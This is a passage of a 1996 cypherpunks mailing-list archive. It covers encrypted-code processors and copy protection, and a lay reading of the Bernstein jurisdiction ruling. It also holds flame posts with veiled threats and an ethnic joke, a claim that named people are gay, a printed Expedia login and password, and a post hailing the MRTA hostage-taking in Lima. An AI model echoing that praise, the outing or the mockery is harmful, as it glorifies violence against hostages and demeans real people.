up against.  There were many, me included, who simply said, "If your
product is copy protected then I will buy from your competitor."


>Viruses are not feasible if the authentication is strong.

So is user written code, public domain code etc.  If there is an
un-encrypted mode for that kind of code, then viruses again become possible.


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 19 Dec 1996 21:44:13 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <geeman@best.com>
Subject: Re: Proof that "cypher punks" have complete degenerated...
Message-ID: <19961220060046578.AAA84@gigante>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Dec 1996 04:24:14 +0000, geeman@best.com wrote:

>It wasn't worth commenting on.
>Appending data after the ctrl-Z as stego?
>Not even worth a letter to the ed!

>> No one even commented on the latest Dr. Dobbs issue.


I know - I was amazed that made it into the issue.  It's almost amazing that
someone would go to such effort to do this and miss all the [IMHO] easier
ways. Simply astounding...

#  Chris Adams  <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>                 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 19 Dec 1996 22:09:06 -0800 (PST)
To: attila@primenet.com
Subject: Re: Nuke the Whales!
In-Reply-To: <199612191853.LAA06104@infowest.com>
Message-ID: <32BA31CE.7B64@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


attila@primenet.com wrote:
> blanc:
>         you know, the last time one of them fuzzy weird colored things,
>     you know, the kind which is always crawling around the edge of any
>     gathering with stick signs and chanting, ...well, the other day one
>     them things accidently crossed my sights, and my whole trigger hand
>     went into an involuntary spasm.
>         ...well, the judge he told me to take my medication and
>     dismissed the charges.  As I thanked the judge and reminded him of
>     the meeting tonight, I remembered the fuzzy little thing's last
>     words: "...Tax the Rich."
>         ...you know, that fuzzy little thing really looked like that
>     city slicker flatlander what up here last month --Dale or somethin'
>     like it!

I spent part of my growing up years in Leroy West Virginia, pop. about
15, give or take.  I know about hillbillies, and I know about guns.

If you had the impression I am a whiner, or that that defines me as a
person, you're about as clueful as the other old farts who attack people
they don't know anything about.  Note I said if, in case you decide to
repent sometime...

By the way, did you think that part about people supporting licensing
was pretty scary?  You know, people who are pretty well off don't like
to live in fear of gangs and stuff like that, and since those people
who have most of the money also have most of the power, it seems to me
they could pull it off. Now, you might be able to hide for a while if
you're clever enough and lucky enough, but I think some of them rich
folk gonna wanna trade some of their fear for some of yours, if you know
what I mean, and I think you do.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Dec 1996 20:10:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "Cypher punks'" sexual preferences
In-Reply-To: <199612200356.TAA25114@mark.allyn.com>
Message-ID: <y8V8yD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark Allyn 206-860-9454 <allyn@allyn.com> writes:

> I am gay.

Mazal Tov. So are John Gilmore and Jason Durbin.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Byer <root@bushing.plastic.crosslink.net>
Date: Thu, 19 Dec 1996 20:12:38 -0800 (PST)
To: ph@netcom.com (Peter Hendrickson)
Subject: Re: Executing Encrypted Code
In-Reply-To: <v02140b02aedfb5d9a7f2@[192.0.2.1]>
Message-ID: <199612200416.XAA00687@bushing.plastic.crosslink.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> 
> At 9:18 PM 12/19/1996, Ben Byer wrote:
> >> At the last meeting references were made to processors which only
> >> execute encrypted code.  Decryption occurs on chip.
> >>
> >> If each chip has a unique public/secret key pair, and executes
> >> authenticated code only, there are some interesting implications.
> 
> > Let's see... What about this scenario:
> 
> > Alice gets a contraband copy of PGP 4.0 off the Internet.  Since the
> > public-key algorithm is publicized so that people can encrypt software
> > to a chip, PGP 4.0 has the ability to encode/decode/generate keys for
> > the chip.  Alice generates a public key/private key pair 0x12345678,
> > in software.  Alice goes to www.microsoft.com and orders Office '99
> > online, and tells Microsoft "Hi, my name is Alice, my credit card
> > number is 31426436136778 and my PGPentium's public key is 0x12345678."
> 
> > Microsoft unwittingly sends Alice a copy encrypted to 0x12345678, for
> > which she has the private key to.  Alice decrypts Office '99, and
> > reencrypts it with public key of her PGPentium, as well as the keys f
> > all her friends.
> 
> The software vendor would be wise to check that the public key was
> legal.  It would be a simple matter for the manufacturer to publicize
> all public keys that had been installed on chips.

The manufacturer is going to publish a list of ALL of the public keys?
We're talking one key per chip, right?  Isn't that an AWFUL lot of
keys, like, in the millions range?

Also... with a few million possible keys like this, all you need to do
is to either guess or factor just one of them.

> > Does the authentication defeat this?
> 
> I'm sort of waving my hands around when I say "authentication".
> 
> One approach is for the manufacturer to authenticate software submitted
> by approved vendors.  The vendors are then tasked with encrypting it
> for the correct processor.

I'm not sure the "approved" bit would go over too well... one idea
would be to license the compiler writers, who would build the
encryption into compilers.  It's still not horribly great, but
better.

> > Our computers would only run software from Microsoft?  Scary.
> 
> There are all sorts of nifty deals that could be made.  Microsoft
> could commission a special run of the processors which only run
> Microsoft approved software.  Machines using these processors could
> be given away or sold at a steep discount.

Right; the only reason I could see people using this would be for
economical reasons.

> You could also timestamp the software so that it only runs for a given
> length of time.  This will encourage people to upgrade regularly.  ;-)
> The processors could also support metering.  

Right; once the user loses control of what he's running, then you can
pretty much do anything you want as far as metering goes.

ObGAK question:  Would this be exportable?  I mean, you could be
encrypting god knows WHAT into those .exe's...  Key escrow?  How would
they get the key?!?  I can see the headlines, "Key Escrow Database
Leaked to Pirate Firm"... :)

- -- 
Ben Byer    root@bushing.plastic.crosslink.net    I am not a bushing

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMroTE7D5/Q37XXHFAQG6sgL8DnusDI/jqV3sn9U5ru2hhJPFxP1dZVpZ
ohmJYteQdraD5/YfmvYNHFfslULB47Spx6ZTpT+xw512iMWJfyW5sN6NtejL6+CM
2BoX0SaRGxZrfVeRFAZAXMVx3/ak1LDk
=HZOI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 19 Dec 1996 22:57:15 -0800 (PST)
To: Bill Frantz <cypherpunks@toad.com
Subject: Re: Executing Encrypted Code
Message-ID: <v02140b07aedfe64543d0@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:52 PM 12/19/1996, Bill Frantz wrote:
>At 12:08 PM -0800 12/19/96, Peter Hendrickson wrote:
>> If each chip has a unique public/secret key pair, and executes
>> authenticated code only, there are some interesting implications.

>> Software piracy becomes difficult, if not impossible.  Code is sold
>> on a processor by processor basis.  Code for a different physical
>> processor cannot be decrypted or executed.

> This makes backup hard.  That is the rock the routine copy protection hit
> up against.  There were many, me included, who simply said, "If your
> product is copy protected then I will buy from your competitor."

No, you can backup just as much as many times as you like.  The code
isn't stored on the chip permanently, it is only decrypted there.

There is a similar problem, though.  If your processor dies you could
lose your software library.  There are ways to mitigate this.  One is
for the vendors to just trust people and reissue the code to a new
processor.  Of course, you track how often you have to do this.

Or, you could turn in the broken processor and have the manufacturer
certify that it was turned in to the software vendors and that
a new version of the software should be generated.

This might not be so important if you generally pay for metered software.

>> Viruses are not feasible if the authentication is strong.

> So is user written code, public domain code etc.  If there is an
> un-encrypted mode for that kind of code, then viruses again become
> possible.

User written code is harder to arrange, it is true.  You might have
a way to execute non-authenticated code but at a speed comparable to
an emulator.

Or, you might just have another computer for running your own code.
Right now it is not uncommon for a software library to exceed the
value of the machine.  It might actually be economical to have two
machines if one of them can support a rich software library which
doesn't cost as much money because it can't be pirated.

Free software is still possible to run at full speed, but it has to
be authenticated.  The free software writer just has to do whatever
the software vendor had to do to get it okayed.  This makes it
harder to release free software, but the effort is still a small fraction
of the work required to build a significant application.  Getting it to
execute for particular processors is easy.  You could release a piece
of software which takes code and encrypts it for your particular
hunk of silicon.

If you could offer otherwise free software for, say, $20 and know
that everybody using it will pay, many people might consider that
to be a great deal.  Right now the mechanisms of moving the software
are too expensive to really make it feasible for something under $20.

Development might be a bit tricky, but there are workable solutions.
The manufacturer could release special processors which have an
additional authentication mechanism for software developers which
is specific to each developer.  They could authenticate code to run
on their own machine, but not on anybody else's.

This does make it possible for software developers to pirate software
(if the can get a secret key), but if the number of development processors
is low, this could be manageable.

If the environment was well defined, you could conceivably develop
in a high level language on one platform, but deploy for sale on the
decrypting-processor platform.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 19 Dec 1996 23:21:24 -0800 (PST)
To: "Scott V. McGuire" <cypherpunks@toad.com>
Subject: Re: Executing Encrypted Code
Message-ID: <v02140b08aedfee1f1c35@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:41 AM 12/20/1996, Scott V. McGuire wrote:
>On Thu, 19 Dec 1996, Peter Hendrickson Wrote:
>> The manufacturer of the encrypted-code processor would protect its
>> instruction set using intellectual property law.  Given the high
>> price of a fab, it is entirely feasible to stop anybody from building
>> a new architecture which can execute the code about as fast as
>> the encrypting-code processor.

> It seems to me that this is where this scheme would be broken.  Have
> intellectual property laws been (successfully) used in this way?

I don't know, but I bet it would be possible to arrange if there was
support for it.

Or, maybe the instruction set itself remains a trade secret.  Sure,
it could leak out, but aren't there laws against industrial espionage?

(If the instruction set was secret, the manufacturer might have to
provide a compilation service.)

> And even if so, would they be enforced in all the countries where the
> chips might be fabricated?

Yes, if the laws exist they would be easy to enforce.  What does
a state-of-the-art fab cost now?  $5 billion?  $10 billion?  I was
generous when I said "G-7".  Which countries can really compete in
this market?  The U.S. and Japan, I believe.

There is no reason to rule out extra-legal pressure, either.  The
USG appears to have played the policeman in supporting the DRAM market
in an informal way.

It would be very easy to have a chat with the Japanese government
about the importance of stopping software piracy.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 19 Dec 1996 23:35:28 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: "Cypher punks'" sexual preferences
In-Reply-To: <y8V8yD11w165w@bwalk.dm.com>
Message-ID: <32BA4609.3EE8@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM wrote:
> Mark Allyn 206-860-9454 <allyn@allyn.com> writes:
> > I am gay.

> Mazal Tov. So are John Gilmore and Jason Durbin.

The problem with the "I am" portion of the above is it's not a whole lot
more defining than "I am" a federal agent, or "I am" a religious zealot,
or "I am" a cryptologist.

If you're a "man" or a "woman", chances are most people will know that
for sure, in person that is.  But when a person says "I'm gay", how do
you know it's true?  Maybe they just wanna play gay, to get better
acceptance on the c-punks list.

Used to be, "gay" was something different, i.e., "The child who's born
on the sabbath day, is bonnie and blithe, and good and gay". What have
they done to my language....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vangelis <vangelis@pnis.net>
Date: Fri, 20 Dec 1996 01:26:27 -0800 (PST)
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Credentials without Identity--Race Bits
In-Reply-To: <1.5.4.32.19961220040241.003a6284@popd.ix.netcom.com>
Message-ID: <32BA5ABE.64F2@pnis.net>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart wrote:
> I've heard that in less civilized parts of the world you're actually
> required to carry government-issued ID cards to walk down the street
> or fly on airplanes.

Umm.. tried to get on a flight without having ID lately?  Doesn't work -
against policy.  Anti-terrorism policy and all.. it's for your own
safety, of course.
-- 
Vangelis <vangelis@qnis.net> /\oo/\
Finger for public key. PGP KeyID 1024/A558B025
PGP Fingerprint AE E0 BE 68 EE 7B CF 04  02 97 02 86 F0 C7 69 25
Life is my religion, the world is my altar.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott V. McGuire" <svmcguir@syr.edu>
Date: Thu, 19 Dec 1996 22:27:26 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Re: Executing Encrypted Code
In-Reply-To: <v03007801aedfc6824d72@[207.167.93.63]>
Message-ID: <Pine.LNX.3.95.961220012542.1038A-100000@homebox>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 19 Dec 1996, Timothy C. May wrote:

> At 7:34 PM -0800 12/19/96, Peter Hendrickson wrote:
> 
> >You could also timestamp the software so that it only runs for a given
> >length of time.  This will encourage people to upgrade regularly.  ;-)
> 
> Or to reset their clocks. Which is what many of us do when software is
> about to "expire."
> 
> (The issue of enforcing "digital time delays" is an interesting one.
> Usually this necessitates some variant of "beacons," presumably on the Net,
> as the local clock can of course not be trusted or counted upon to be
> accurate. I wrote a couple of articles on this several years ago...I'll see
> if I can find them if there's interest.)
> 
> --Tim May
> 
> Just say "No" to "Big Brother Inside"
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1398269     | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 

Just off the top of my head, the chips could come connected to a battery
to maintain an internal clock and be configured to stop functioning if it
is ever disconnected.  Since the life expectancy of one generation of a
cpu is so short now, limiting the life of a chip to that of a battery is
not much of a problem.  Also, if these are given away as was suggested,
the fact that a dead battery would kill your computer is no big deal.


<<<< NOTE CHANGE IN WHO'S BEING QUOTED >>>>
On Thu, 19 Dec 1996, Peter Hendrickson Wrote:

>

... stuff deleted ...

> The manufacturer of the encrypted-code processor would protect its
> instruction set using intellectual property law.  Given the high
> price of a fab, it is entirely feasible to stop anybody from building
> a new architecture which can execute the code about as fast as
> the encrypting-code processor.
>

It seems to me that this is where this scheme would be broken.  Have
intellectual property laws been (successfully) used in this way?  And even
if so, would they be enforced in all the countries where the chips might
be fabricated?

>
> Peter Hendrickson
> ph@netcom.com
>

- --------------------
Scott V. McGuire <svmcguir@syr.edu>
PGP key available at http://web.syr.edu/~svmcguir
Key fingerprint = 86 B1 10 3F 4E 48 75 0E  96 9B 1E 52 8B B1 26 05




-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBMro1I97xoXfnt4lpAQHD9gQAo0rwSzXmo8Qu46auFGhcp6RaWDDwxHtS
SZNoy2L3VVVECgNb+wuHSdHlPCdocK/sWzncmg4DSipa81r4cUK/8hIbvEJp+rRz
qS6vs2VpxEMaTLUA+RS82Bc/c99b3AjGtjf55uYdgVIbGfH4Tnqc1yvzDcP03G//
mVVQTga4lHA=
=gXr8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Fri, 20 Dec 1996 11:50:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Pretty Lousy Privacy
In-Reply-To: <3.0.32.19961219135408.00695a98@smtp1.abraxis.com>
Message-ID: <32BA9300.1716@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Alec wrote:
> How soon can we expect Turkish and Armenian language modules for this beta?

Alec,
  All of our Turkish programmers are dead.  All of our Armenian 
programmers'
keyboards are screwed because of the blood dripping off of their fingers.
  Say, you don't think Dr. DVK could be onto something here, do you? (:>)
-- 
Reply to:toto@sk.sympatico.ca
"There's only one two."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Fri, 20 Dec 1996 11:42:38 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: some clarification of jurisdiction in Berstein (long)
Message-ID: <199612201141.EAA01559@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

the question:

::I've seen two other reports (one from NBC) that say the ruling
::only covers the one federal district.

::Any lawyers want to clarify?

        The caveat: the following is a personal opinion and is not, in 
    any way, to be considered either legal opinion or legal advice. 
    Hire an attorney who specializes in these issues before you do 
    anything rash which might qualify you for three hots and a cot.

        Basically, jurisdiction is all a question of who wants to 
    honor whose decision until a higher level either affirms or 
    rejects the lower court ruling (or sends it back w/o a full ruling 
    but requiring a review of some part of the decision by the lower 
    court).

        Generally speaking, the decision is valid for the Northern 
    District of California, but a Federal district judge anywhere in 
    the U.S. can make a concurring decision based on citing Judge 
    Patel's decision that source code is protected under Amendment 1.
    In other words, the cite is valid anywhere, and can be used as the 
    basis of a decision. 

        Likewise, another district judge somewhere in the U.S. can 
    issue a contrary ruling, still citing Judge Patel's ruling, but 
    disagreeing with its tenants; or even ignore the decision and 
    forge new ground. 

        The basic rule of thumb is each federal judge is 'Judge Roy 
    Bean, Law West of the Pecos' in his own courtroom, and able to 
    virtually ignore even USSC rulings by claiming the action is not 
    the same for some silly reason.  He may be reversed on appeal... 

        As for Judge Roy Bean, there have been a number who might 
    qualify for the type in the Ninth Circuit who come to mind: Manny 
    Real in LA, Hadder in LA, Foley in Vegas, and one in El Paso 
    (whose name escapes me --maybe Peck), who was assassinated, 
    probably by the drug trade, about 20 years ago. These are 
    mavericks with a high percentage of cases reversed on appeal. Two 
    of the four are of questionably diminished mental abilities, one 
    was of questionable ethics, and one is just plain nuts --or at 
    least off the wall (IMHO).  

        I have not read the full Bernstein decision as yet, but I 
    understand there are a fair number of unresolved issues such as 
    binary objects. This again can spawn additional test cases, either 
    by someone challenging the issue as Bernstein challenged the 
    source code, which I consider was the correct decision as anyone 
    can read source --understanding source code may be more difficult 
    than reading a bad Russian translation of the nuances in Alice in 
    Wonderland for some... (your mileage may vary...)

        Leaving government appeals out of the equation, if there are 
    two or more district courts within an appeals circuit, whose 
    fundamental opinion: 'source code is protected under Amendment 1 
    rights' do not agree, the obvious step is for the Ninth Circuit 
    Court of Appeals, either by a 3 judge panel, or a full court 
    review, to take jurisdiction and decide which of the two opinions 
    suits their fancy. If a 3 judge panel does not give the decision 
    expected, there is also a possible review by a full court on the 
    motion of either party.

        Now, suppose the Ninth Circuit affirms Judge Patel. At that 
    point every district court within the jurisdiction of the Ninth 
    Circuit uses the Bernstein case as a given, an affirmed precedent; 
    the rulings will reflect that unless some clever clown adds a 
    twist and the judge falls for it. 

        Again, setting aside appeals, there are multiple circuit 
    appeal regions.  None of these are bound by the Ninth Circuit 
    decision, but it is a citation of importance.  Now, if there are 
    significantly different opinions in the appeal circuits, then the 
    Supreme Court will decide whether they will accept the decisions 
    for review, deciding which decision is valid; or the USSC can 
    ignore it.

        Personally, I would publish anything regardless. I've had more 
    than one go around with the simpletons. 

        The first time the goons in gray trenchcoats shake you out of 
    the rack in the early morning, there is a real adrenalin rush; 
    after that it's: "Oh, shit, you guys again, who wants some 
    coffee?"  Whatever you do: keep your mouth shut; even teh previous 
    thought is risky the assholes might charge you with attempted 
    bribary of a Federal official.  

        I have been quiet for 20 years; as you get older you get a lot 
    more cranky, and less concerned with your welfare. You know: 
    "strike another blow for Liberty, FUCK the CDA" and so on.  Be a 
    martyr; give your all for the cause.  Eventually you end up in 
    Springfield, Missouri, home for Federal Criminally Insane 
    political victims. 

        Larry Flynt (Hustler) managed to get away from the Feds who 
    can hold an "insane" individual in their custody indefinitely: 
    certifying him insane with one hand, while the other hand gives 
    him a chemical lobotomy. Larry Flynt was sent to Springfield by a 
    Federal Judge in LA for contempt of court --wearing an American 
    flag as a diaper in his wheelchair (paraplegic).  

        Unless you're a little crazy, I don't think I would start 
    publishing source code yet. Oh, I expect it would be difficult 
    for the Feds to get convictions with a strong precedent decision.

        But, keep in mind, federal judges are appointed on the basis 
    of an ad in the local bar rag: 'wanted: middle aged person with 
    failing law practice and good political connections.'  A Federal 
    judge is appointed for life; after age 65 they are able to choose 
    cases which interest them; most of them seem to die on the bench 
    (some would dispute they were ever alive on the bench). 

        It's been said, "what do you call a lawyer with an IQ of 40?"  
        "Your, Honour."

        If you wish to lay down the bait trail in the Northern 
    California district, by all means, go ahead, but you might find 
    yourself charged in a criminal action, and the government 
    presenting a case that your charges are 'different' than the 
    Bernstein case: Bernstein just wanted to publish an academic 
    paper, you are charged with violation of the munitions act and 
    maybe treason and espionage. 

        And, always remember your opponent is a drug-crazed 800 lb
    gorilla with a mission: conviction.  

        This case is the big one: Bernstein was the plaintiff, in a 
    civil action. You will be the _defendant_, in a criminal action. 

        I would not put a scenario like this past the DOJ scum; maybe 
    multiple times to try and obtain results which match their 
    corroded mental image of peace, prosperity, and union harmony.
  
        The DOJ is not interested in either justice or the Bill of 
    Rights. Federal attorneys are striving for high conviction rates, 
    like Vietnam body counts --and are enforcing the policies of the 
    administration, not the courts, the constitution, or the people. 
 
        If you managed to get here through the convoluted logic, I 
    would be careful of how you loosen the floodgates.  At this point 
    we have made a statement which is a serious breach of their armor. 
    We obviously need additional test cases to clarify the position, 
    and the decision must ultimately be decided by the USSC. 

        I would caution for another reason: if the Feds choose a 
    preferred defendant who is flagrant, obnoxious, and on flaky 
    ground; _they_ may have a good precedent, not us. Academic 
    challenges are certainly among the best --a bit easier to make the 
    point for education than for pornography. 

        The next step IMHO, should be a challenge that object code is 
    just a shipping container for the source code.

==
  I'll get a life when it is proven
    and substantiated to be better
      than what I am currently experiencing.
            --attila


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMrp6r704kQrCC2kFAQHx/gP6AoTCk7gEIjylULrXJcTS+QnOtV8Ic5s1
R0iPC0q3/67z9kROekOGOGkD1SRD8umnrO5rb7NRgJDBpdSzt1Hlp+FWZlH1HgZQ
HmR0FZ6QUy1JKC9QJrw0oNTCaful/u4UHTAQLi4R8sTSx1RM/uWfR4Lw4kMKSQ11
Xa6hPWcvNZE=
=Of3t
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: accthelp@expedia.com
Date: Thu, 19 Dec 1996 21:24:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Expedia New Member Information
Message-ID: <199612200540.FAA10746@mx1.expedia.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Microsoft Expedia Travel Services!  

Below is your new membership information.  Please keep this
confirmation mail as a record of your Member ID and Password.

Your Member ID is: cypherpunks
Your Password is:  cypherpunks

The Expedia Internet address is: http://expedia.msn.com/

Expedia is a free service.  To use the Expedia Travel Agent,
you will have to type your Member ID and Password on the
Sign In page.
 
Whether for business or pleasure, Microsoft Expedia makes it 
easy for you to plan and purchase travel arrangements that best
meet your budget and personal preferences.  Expedia is on the job
24 hours a day, 7 days a week.  With a click of your mouse, you can:

* Reserve and purchase airline tickets
* Reserve hotel rooms
* Reserve rental cars
* Subscribe to Fare Tracker for the lowest airfares to your favorite destinations
* Research over 300 destinations in the Expedia World Guide
* Chart your course with over 200 city maps
* Check out the world of adventure in the Mungo Park online magazine
* Catch up on the latest travel news, weather and more

We look forward to fulfilling all of your travel needs.

Expedia Member Services
Start your travel here.
http://expedia.msn.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aaron@burn.ucsd.edu (Aaron)
Date: Fri, 20 Dec 1996 11:40:23 -0800 (PST)
To: aaron@burn.ucsd.edu (All recipients)
Subject: Solidarity with Peruvian Guerrilla!
Message-ID: <v02130501aee03559777a@[136.152.11.117]>
MIME-Version: 1.0
Content-Type: text/plain


** See list of useful Web sites at end of this post! **

Companer@s,

I am writing this while I am tired and should be asleep, since I think that
this matter is too urgent to delay. I apologize for any careless
formulations.

By now, you all know that the Peruvian guerrilla group MRTA (Movimiento
Revolucionario Tupac Amaru) has occupied the mansion of the Japanese
ambassador in Lima and is holding several hundred prisoners. Unless you are
in an unusual part of the world, you also have seen how the bourgeois media
are discussing the matter as a problem of how to deal with 'terrorists.'

For the working people and all the oppressed and exploited of the world,
and for socialists, communists, and anarchists, the seizure of the
ambassador's residence along with about 400 bourgeois dinner guests is a
great accomplishment. It is a blow against the terrorism of the Peruvian
state and its imperialist patrons! Those captured in the raid include many
members of the Peruvian and international ruling elite, including the head
of Peru's secret police! It will be politically very difficult for the
Peruvian state to launch a military attack as a means of resolving the
crisis, since that would create quite a few 'illustrious corpses' and lead
to a falling out among bourgeois sectors.. (And it would be difficult to
get the world's poor majority to join the bourgeoisie in mourning its
dead!) It seems that there is already a falling out between Fujimori and
the Japanese over Fujimori's refusal, so far, to negotiate.

It is very important that the situation in Lima not be resolved in a way
that can be seen as a victory for the bourgeoisie. It is our task to
publicize who the real criminals are in Peru and to help wring concessions
from the Peruvian dictatorship. In particular, we should demand the release
of all political prisoners and prisoners of war from Peru's hideous
torture-chamber prisons. In this context, let's not get involved in
sectarian battles among the various factions of Peru's anti-government
left. Whatever differences the groups have, and these are very serious, we
must keep in mind that the Peruvian state and its imperialist backers (in
Washington, Tokyo, London, Bonn, etc.) are the main enemy. All political
prisoners must be released, whether of MRTA, the PCP (Shining Path) or
neither.

Thanks to the widespread publicity given to the events in Lima, many more
people will be interested in what we have to say about Peru than normally
would. Let's organize demonstrations at Peruvian Embassies, Consulates,
airline offices, etc. Let's raise our voices in whatever forum may be
available to defend the heroic guerrillas and to denounce the real
terrorists.

--In solidarity,
--Aaron <aaron@burn.ucsd.edu>

P.S. Plans are being made for a demonstration at the Peruvian Consulate in
San Francisco, California -- probably on Monday, December 23. If you live
in the area, please send me an e-mail message. Otherwise, do what you can
in your area!

SOME USEFUL WEB SITES:

Web site on the current crisis:
<http://burn.ucsd.edu/~ats/mrta.htm>

What Are The Goals Of Your Embassy Occupation? -- Interview With Norma
Velazco, Representative Of The Tupac Amaru Revolutionary Movement (MRTA) In
Peru:
<http://burn.ucsd.edu/~archive/ats-l/1996.Dec/0089.html>

Partial list of hostages:
<http://burn.ucsd.edu/~archive/ats-l/1996.Dec/0092.html>

MRTA's web site in Europe:
<http://www.cybercity.dk/users/ccc17427/>

Lima's best bourgeois newspaper (in Spanish):
http://ekeko.rcp.net.pe/LaRepublica/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Fri, 20 Dec 1996 11:40:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Life with Dale
Message-ID: <199612201454.GAA26329@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


:From: Dale Thorn <dthorn@gte.net>

:I spent part of my growing up years in Leroy West Virginia, pop. :about 15, give or take.  I know about hillbillies, and I know about :guns.

:If you had the impression I am a whiner, or that that defines me as a
:person, you're about as clueful as the other old farts who attack :people they don't know anything about.

Name one thing Dale has not experienced.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 20 Dec 1996 11:39:36 -0800 (PST)
To: attila@primenet.com
Subject: Re: Nuke the Whales!
In-Reply-To: <199612201150.EAA01646@infowest.com>
Message-ID: <32BAB239.BF1@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


attila@primenet.com wrote:
>         Oh, come on, Dale. loosen up and recognize satire when you see it.
>         satire is a far cry from sarcasm, and although it may appear to
>     have a victim, it is more of a social comment in general.
>         good sarcasm can even tell stories which are bald faced lies and
>     still not be dishonest --caveat emptor.

I enjoy the occasional moments of humor here, even when it doesn't show.
Do you play poker well?

One thing I like to do myself is switch sides and taunt the subscribers
with "what's gonna happen when Hillary wins", and stuff of that nature.

The part that's both hilarious (no pun intended) and very scary is
that it really could happen.

Enjoy your life while you still have the chance (hee hee).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Fri, 20 Dec 1996 11:39:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Executing Encrypted Code
Message-ID: <199612201543.HAA02076@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Ben Byer <root@bushing.plastic.crosslink.net>
> [Quoting Peter Hendrickson:]
> > The software vendor would be wise to check that the public key was
> > legal.  It would be a simple matter for the manufacturer to publicize
> > all public keys that had been installed on chips.
>
> The manufacturer is going to publish a list of ALL of the public keys?
> We're talking one key per chip, right?  Isn't that an AWFUL lot of
> keys, like, in the millions range?

Probably an easier way would be for the chip manufacturer to issue a
key certificate (signature) on the chip keys.  Then it is a trivial
matter for any software manufacturer to verify that a proferred chip
key is legit; just check the cert.

> > One approach is for the manufacturer to authenticate software submitted
> > by approved vendors.  The vendors are then tasked with encrypting it
> > for the correct processor.
>
> I'm not sure the "approved" bit would go over too well... one idea
> would be to license the compiler writers, who would build the
> encryption into compilers.  It's still not horribly great, but
> better.

Hey, it's a free world, right?  Some people only run authenticated
code from big companies; other people turn off the authentication
bit in the CPU and can run any old thing they stumble across on the net.
Everybody's happy.  The first group doesn't have to worry about viruses,
or at least they have somebody to sue if they see one, and the second
group gets to run all the freeware and PD code they can today.
